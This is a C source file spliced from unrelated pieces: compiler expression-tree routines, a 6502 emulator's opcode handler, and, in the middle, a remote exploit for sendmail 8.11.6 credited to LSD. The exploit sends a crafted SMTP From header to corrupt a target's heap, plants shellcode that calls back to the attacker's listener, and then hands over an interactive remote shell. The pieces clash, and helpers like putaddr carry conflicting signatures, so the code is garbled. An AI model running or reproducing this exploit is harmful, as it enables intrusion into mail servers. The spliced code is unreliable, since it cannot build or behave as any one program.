void initasmcode(char *addr,int port) {
char abuf[4],amask[4],pbuf[2],pmask[2];
char name[256];
struct hostent *hp;
int i;
if (!addr) gethostname(name,sizeof(name));
else strcpy(name,addr);
if ((i=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&i,hp->h_addr,4);
}
putaddr(abuf,rev(i));
pbuf[0]=(port>>8)&0xff;
pbuf[1]=(port)&0xff;
findvalmask(abuf,amask,4);
findvalmask(pbuf,pmask,2);
memcpy(&shellcode[AOFF],abuf,4);
memcpy(&shellcode[AMSK],amask,4);
memcpy(&shellcode[POFF],pbuf,2);
memcpy(&shellcode[PMSK],pmask,2);
}
LOCAL NODE *
putchop(bigptr p)
{
NODE *p1;
p1 = putaddr( putch1(p) , NO );
return p1;
}
LOCAL NODE *
putcxop(bigptr q)
{
NODE *p;
p = putaddr(putcx1(q), NO);
return p;
}
/*
* Compare character(s) code.
*/
LOCAL NODE *
putchcmp(struct bigblock *p)
{
NODE *p1, *p2, *p3;
if(ISONE(p->b_expr.leftp->vleng) && ISONE(p->b_expr.rightp->vleng) ) {
p1 = putaddr( putch1(p->b_expr.leftp) , YES );
p2 = putaddr( putch1(p->b_expr.rightp) , YES );
p3 = mkbinode(ops2[p->b_expr.opcode], p1, p2, CHAR);
ckfree(p);
} else {
p->b_expr.leftp = call2(TYINT,"s_cmp",
p->b_expr.leftp, p->b_expr.rightp);
p->b_expr.rightp = MKICON(0);
p3 = putop(p);
}
return p3;
}
/*
* Assign a character to another.
*/
LOCAL NODE *
putcheq(struct bigblock *p)
{
NODE *p1, *p2, *p3;
if( p->b_expr.rightp->tag==TEXPR &&
p->b_expr.rightp->b_expr.opcode==OPCONCAT )
p3 = putcat(p->b_expr.leftp, p->b_expr.rightp);
else if( ISONE(p->b_expr.leftp->vleng) &&
ISONE(p->b_expr.rightp->vleng) ) {
p1 = putaddr( putch1(p->b_expr.leftp) , YES );
p2 = putaddr( putch1(p->b_expr.rightp) , YES );
p3 = mkbinode(ASSIGN, p1, p2, CHAR);
} else
p3 = putx(call2(TYINT, "s_copy",
p->b_expr.leftp, p->b_expr.rightp));
frexpr(p->vleng);
ckfree(p);
return p3;
}
LOCAL NODE *
putop(bigptr q)
{
NODE *p;
int k;
bigptr lp, tp;
int pt, lt;
#ifdef PCC_DEBUG
if (tflag) {
printf("putop %p\n", q);
fprint(q, 0);
}
#endif
switch(q->b_expr.opcode) { /* check for special cases and rewrite */
case OPCONV:
pt = q->vtype;
lp = q->b_expr.leftp;
lt = lp->vtype;
while(q->tag==TEXPR && q->b_expr.opcode==OPCONV &&
((ISREAL(pt)&&ISREAL(lt)) ||
(XINT(pt)&&(ONEOF(lt,MSKINT|MSKADDR))) )) {
if(lp->tag != TEXPR) {
if(pt==TYINT && lt==TYLONG)
break;
if(lt==TYINT && pt==TYLONG)
break;
}
ckfree(q);
q = lp;
pt = lt;
lp = q->b_expr.leftp;
lt = lp->vtype;
}
if(q->tag==TEXPR && q->b_expr.opcode==OPCONV)
break;
p = putx(q);
return p;
case OPADDR:
lp = q->b_expr.leftp;
if(lp->tag != TADDR) {
tp = fmktemp(lp->vtype, lp->vleng);
p = putx(mkexpr(OPASSIGN, cpexpr(tp), lp));
sendp2(p);
lp = tp;
}
p = putaddr(lp, NO);
ckfree(q);
return p;
}
if ((k = ops2[q->b_expr.opcode]) <= 0)
fatal1("putop: invalid opcode %d (%d)", q->b_expr.opcode, k);
p = putx(q->b_expr.leftp);
if(q->b_expr.rightp)
p = mkbinode(k, p, putx(q->b_expr.rightp), types2[q->vtype]);
else
p = mkunode(k, p, 0, types2[q->vtype]);
if(q->vleng)
frexpr(q->vleng);
ckfree(q);
return p;
}
/*
* Convert a f77 tree statement to something that looks like a
* pcc expression tree.
*/
NODE *
putx(bigptr q)
{
struct bigblock *x1;
NODE *p = NULL; /* XXX */
int opc;
int type, k;
#ifdef PCC_DEBUG
if (tflag) {
printf("putx %p\n", q);
fprint(q, 0);
}
#endif
switch(q->tag) {
case TERROR:
ckfree(q);
break;
case TCONST:
switch(type = q->vtype) {
case TYLOGICAL:
type = tyint;
case TYLONG:
case TYSHORT:
p = mklnode(ICON, q->b_const.fconst.ci,
0, types2[type]);
ckfree(q);
break;
case TYADDR:
p = mklnode(ICON, 0, 0, types2[type]);
p->n_name = copys(memname(STGCONST,
(int)q->b_const.fconst.ci));
ckfree(q);
break;
default:
p = putx(putconst(q));
break;
}
break;
case TEXPR:
switch(opc = q->b_expr.opcode) {
case OPCALL:
case OPCCALL:
if( ISCOMPLEX(q->vtype) )
p = putcxop(q);
else {
putcall(q);
p = callval;
}
break;
case OPMIN:
case OPMAX:
p = putmnmx(q);
break;
case OPASSIGN:
if (ISCOMPLEX(q->b_expr.leftp->vtype) ||
ISCOMPLEX(q->b_expr.rightp->vtype)) {
frexpr(putcxeq(q));
} else if (ISCHAR(q))
p = putcheq(q);
else
goto putopp;
break;
case OPEQ:
case OPNE:
if (ISCOMPLEX(q->b_expr.leftp->vtype) ||
ISCOMPLEX(q->b_expr.rightp->vtype) ) {
p = putcxcmp(q);
break;
}
case OPLT:
case OPLE:
case OPGT:
case OPGE:
if(ISCHAR(q->b_expr.leftp))
p = putchcmp(q);
else
goto putopp;
break;
case OPPOWER:
p = putpower(q);
break;
case OPSTAR:
/* m * (2**k) -> m<<k */
if (XINT(q->b_expr.leftp->vtype) &&
ISICON(q->b_expr.rightp) &&
((k = flog2(q->b_expr.rightp->b_const.fconst.ci))>0) ) {
q->b_expr.opcode = OPLSHIFT;
frexpr(q->b_expr.rightp);
q->b_expr.rightp = MKICON(k);
goto putopp;
}
case OPMOD:
goto putopp;
case OPPLUS:
case OPMINUS:
case OPSLASH:
case OPNEG:
if( ISCOMPLEX(q->vtype) )
p = putcxop(q);
else
goto putopp;
break;
case OPCONV:
if( ISCOMPLEX(q->vtype) )
p = putcxop(q);
else if (ISCOMPLEX(q->b_expr.leftp->vtype)) {
p = putx(mkconv(q->vtype,
realpart(putcx1(q->b_expr.leftp))));
ckfree(q);
} else
goto putopp;
break;
case OPAND:
/* Create logical AND */
x1 = fmktemp(TYLOGICAL, NULL);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(0)));
k = newlabel();
putif(q->b_expr.leftp, k);
putif(q->b_expr.rightp, k);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(1)));
putlabel(k);
p = putx(x1);
break;
case OPNOT: /* Logical NOT */
x1 = fmktemp(TYLOGICAL, NULL);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(1)));
k = newlabel();
putif(q->b_expr.leftp, k);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(0)));
putlabel(k);
p = putx(x1);
break;
case OPOR: /* Create logical OR */
x1 = fmktemp(TYLOGICAL, NULL);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(1)));
k = newlabel();
putif(mkexpr(OPEQ, q->b_expr.leftp,
mklogcon(0)), k);
putif(mkexpr(OPEQ, q->b_expr.rightp,
mklogcon(0)), k);
putexpr(mkexpr(OPASSIGN, cpexpr(x1),
mklogcon(0)));
putlabel(k);
p = putx(x1);
break;
case OPCOMMA:
for (x1 = q; x1->b_expr.opcode == OPCOMMA;
x1 = x1->b_expr.leftp)
putexpr(x1->b_expr.rightp);
p = putx(x1);
break;
case OPEQV:
case OPNEQV:
case OPADDR:
case OPBITOR:
case OPBITAND:
case OPBITXOR:
case OPBITNOT:
case OPLSHIFT:
case OPRSHIFT:
putopp:
p = putop(q);
break;
default:
fatal1("putx: invalid opcode %d", opc);
}
break;
case TADDR:
p = putaddr(q, YES);
break;
default:
fatal1("putx: impossible tag %d", q->tag);
}
return p;
}
int main(int argc,char **argv){
int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
fd_set readfs;
struct timeval t;
struct sockaddr_in address;
struct hostent *hp;
char buf[4096],cmd[4096];
char *p,*host,*myhost=NULL;
printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");
if (argc<3) {
printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
switch(c) {
case 'b': port=atoi(optarg);break;
case 'c': count=atoi(optarg);break;
case 'l': myhost=optarg;break;
case 't': timeout=atoi(optarg);break;
case 'v': vers=atoi(optarg);break;
case 'p': sscanf(optarg,"%x",&MPTR);
}
}
host=argv[1];
srv=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(port);
if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: bind\n");exit(-1);
}
if (listen(srv,10)==-1) {
printf("error: listen\n");exit(-1);
}
initasmcode(myhost,port);
for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
PTR=MPTR;
sck=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(25);
if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
if ((hp=gethostbyname(host))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
}
if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: connect\n");exit(-1);
}
initlookup();
sendcommand(sck,"helo yahoo.com\n",0);
sendcommand(sck,"mail from: [email protected]\n",0);
sendcommand(sck,"rcpt to: lp\n",0);
sendcommand(sck,"data\n",0);
aidx=findblock(PTR,PNUM*4,1);
ALLOCBLOCK(aidx,PNUM*4);
aptr=IDX2PTR(aidx);
printf(".");fflush(stdout);
jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);
switch(vers) {
case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
default: exit(-1);
}
i2-=8;
p=buf;
for(i=0;i<138;i++) {
*p++='<';*p++='>';
}
*p++='(';
for(i=0;i<l;i++) *p++=NOP;
*p++=')';
*p++=0;
putaddr(&buf[OFF3+l],aptr);
sprintf(cmd,"From: %s\n",buf);
sendcommand(sck,cmd,0);
sendcommand(sck,"Subject: hello\n",0);
memset(cmd,NOP,MAXLINE);
cmd[MAXLINE-2]='\n';
cmd[MAXLINE-1]=0;
cnt=0;
while(cnt<PNUM) {
sptr=aptr;
fptr=IDX2PTR(OFF2);
if (!(sidx=findsblock(sptr))) break;
sptr=IDX2PTR(sidx);
if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
fptr=IDX2PTR(fidx);
jmp=IDX2PTR(jidx);
while (!validaddr(jmp)) jmp+=4;
putaddr(&cmd[aidx],sptr);
putaddr(&cmd[sidx+0x24],aptr);
putaddr(&cmd[sidx+0x28],aptr);
putaddr(&cmd[sidx+0x18],fptr-i2-i3);
putaddr(&cmd[fidx-i2-i3],0x01010101);
putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);
putaddr(&cmd[fidx-i3],fptr-i3);
putaddr(&cmd[fidx],jmp);
aidx+=4;
PTR-=4;
cnt++;
}
p=&cmd[jidx+4*PNUM];
for(i=0;i<strlen(shellcode);i++) {
*p++=shellcode[i];
}
sendcommand(sck,cmd,0);
sendcommand(sck,"\n",0);
sendcommand(sck,".\n",0);
free(lookup);
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(srv,&readfs);
t.tv_sec=timeout;
t.tv_usec=0;
if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
close(sck);
found=1;
if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
printf("error: accept\n");exit(-1);
}
close(srv);
printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);
write(sck,"/bin/uname -a\n",14);
} else {
close(sck);
found=0;
}
while(found){
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(sck,&readfs);
if(select(sck+1,&readfs,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&readfs)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&readfs)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(1,buf,cnt);
}
}
}
}
}
static inline void cpuParse(unsigned char opc) {
int cmd = opcodes[opc];
int addr = modes[opc];
int c;
switch (cmd) {
case adc:
wval=(unsigned short)a+getaddr(addr)+((p&FLAG_C)?1:0);
setflags(FLAG_C, wval&0x100);
a=(unsigned char)wval;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a&0x80);
setflags(FLAG_V, (!!(p&FLAG_C)) ^ (!!(p&FLAG_N)));
break;
case and_:
bval=getaddr(addr);
a&=bval;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a&0x80);
break;
case asl:
wval=getaddr(addr);
wval<<=1;
setaddr(addr,(unsigned char)wval);
setflags(FLAG_Z,!wval);
setflags(FLAG_N,wval&0x80);
setflags(FLAG_C,wval&0x100);
break;
case bcc:
branch(!(p&FLAG_C));
break;
case bcs:
branch(p&FLAG_C);
break;
case bne:
branch(!(p&FLAG_Z));
break;
case beq:
branch(p&FLAG_Z);
break;
case bpl:
branch(!(p&FLAG_N));
break;
case bmi:
branch(p&FLAG_N);
break;
case bvc:
branch(!(p&FLAG_V));
break;
case bvs:
branch(p&FLAG_V);
break;
case bit:
bval=getaddr(addr);
setflags(FLAG_Z,!(a&bval));
setflags(FLAG_N,bval&0x80);
setflags(FLAG_V,bval&0x40);
break;
case brk:
pc=0; /* Just quit the emulation */
break;
case clc:
setflags(FLAG_C,0);
break;
case cld:
setflags(FLAG_D,0);
break;
case cli:
setflags(FLAG_I,0);
break;
case clv:
setflags(FLAG_V,0);
break;
case cmp:
bval=getaddr(addr);
wval=(unsigned short)a-bval;
setflags(FLAG_Z,!wval);
setflags(FLAG_N,wval&0x80);
setflags(FLAG_C,a>=bval);
break;
case cpx:
bval=getaddr(addr);
wval=(unsigned short)x-bval;
setflags(FLAG_Z,!wval);
setflags(FLAG_N,wval&0x80);
setflags(FLAG_C,x>=bval);
break;
case cpy:
bval=getaddr(addr);
wval=(unsigned short)y-bval;
setflags(FLAG_Z,!wval);
setflags(FLAG_N,wval&0x80);
setflags(FLAG_C,y>=bval);
break;
case dec:
bval=getaddr(addr);
bval--;
setaddr(addr,bval);
setflags(FLAG_Z,!bval);
setflags(FLAG_N,bval&0x80);
break;
case dex:
x--;
setflags(FLAG_Z,!x);
setflags(FLAG_N,x&0x80);
break;
case dey:
y--;
setflags(FLAG_Z,!y);
setflags(FLAG_N,y&0x80);
break;
case eor:
bval=getaddr(addr);
a^=bval;
setflags(FLAG_Z,!a);
setflags(FLAG_N,a&0x80);
break;
case inc:
bval=getaddr(addr);
bval++;
setaddr(addr,bval);
setflags(FLAG_Z,!bval);
setflags(FLAG_N,bval&0x80);
break;
case inx:
x++;
setflags(FLAG_Z,!x);
setflags(FLAG_N,x&0x80);
break;
case iny:
y++;
setflags(FLAG_Z,!y);
setflags(FLAG_N,y&0x80);
break;
case jmp:
wval=getmem(pc++);
wval|=256*getmem(pc++);
switch (addr) {
case abs:
pc=wval;
break;
case ind:
pc=getmem(wval);
pc|=256*getmem(wval+1);
break;
}
break;
case jsr:
push((pc+1)>>8);
push((pc+1));
wval=getmem(pc++);
wval|=256*getmem(pc++);
pc=wval;
break;
case lda:
a=getaddr(addr);
setflags(FLAG_Z,!a);
setflags(FLAG_N,a&0x80);
break;
case ldx:
x=getaddr(addr);
setflags(FLAG_Z,!x);
setflags(FLAG_N,x&0x80);
break;
case ldy:
y=getaddr(addr);
setflags(FLAG_Z,!y);
setflags(FLAG_N,y&0x80);
break;
case lsr:
bval=getaddr(addr); wval=(unsigned char)bval;
wval>>=1;
setaddr(addr,(unsigned char)wval);
setflags(FLAG_Z,!wval);
setflags(FLAG_N,wval&0x80);
setflags(FLAG_C,bval&1);
break;
case nop:
break;
case ora:
bval=getaddr(addr);
a|=bval;
setflags(FLAG_Z,!a);
setflags(FLAG_N,a&0x80);
break;
case pha:
push(a);
break;
case php:
push(p);
break;
case pla:
a=pop();
setflags(FLAG_Z,!a);
setflags(FLAG_N,a&0x80);
break;
case plp:
p=pop();
break;
case rol:
bval=getaddr(addr);
c=!!(p&FLAG_C);
setflags(FLAG_C,bval&0x80);
bval<<=1;
bval|=c;
setaddr(addr,bval);
setflags(FLAG_N,bval&0x80);
setflags(FLAG_Z,!bval);
break;
case ror:
bval=getaddr(addr);
c=!!(p&FLAG_C);
setflags(FLAG_C,bval&1);
bval>>=1;
bval|=128*c;
setaddr(addr,bval);
setflags(FLAG_N,bval&0x80);
setflags(FLAG_Z,!bval);
break;
case rti:
/* Treat RTI like RTS */
case rts:
wval=pop();
wval|=pop()<<8;
pc=wval+1;
break;
case sbc:
bval=getaddr(addr)^0xff;
wval=(unsigned short)a+bval+((p&FLAG_C)?1:0);
setflags(FLAG_C, wval&0x100);
a=(unsigned char)wval;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a>127);
setflags(FLAG_V, (!!(p&FLAG_C)) ^ (!!(p&FLAG_N)));
break;
case sec:
setflags(FLAG_C,1);
break;
case sed:
setflags(FLAG_D,1);
break;
case sei:
setflags(FLAG_I,1);
break;
case sta:
putaddr(addr,a);
break;
case stx:
putaddr(addr,x);
break;
case sty:
putaddr(addr,y);
break;
case tax:
x=a;
setflags(FLAG_Z, !x);
setflags(FLAG_N, x&0x80);
break;
case tay:
y=a;
setflags(FLAG_Z, !y);
setflags(FLAG_N, y&0x80);
break;
case tsx:
x=s;
setflags(FLAG_Z, !x);
setflags(FLAG_N, x&0x80);
break;
case txa:
a=x;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a&0x80);
break;
case txs:
s=x;
break;
case tya:
a=y;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a&0x80);
break;
case slo:
bval = getaddr(addr);
setflags(FLAG_C, bval >> 7);
bval <<= 1;
setaddr(addr, bval);
a |= bval;
setflags(FLAG_Z, !a);
setflags(FLAG_N, a&0x80);
break;
case axs:
x = (x & a) - getaddr(addr);
setflags(FLAG_Z, a == 0);
setflags(FLAG_N, a > 127);
break;
case lax:
a = x = getaddr(addr);
setflags(FLAG_Z, a == 0);
setflags(FLAG_N, a & 0x80);
break;
default:
break;
}
}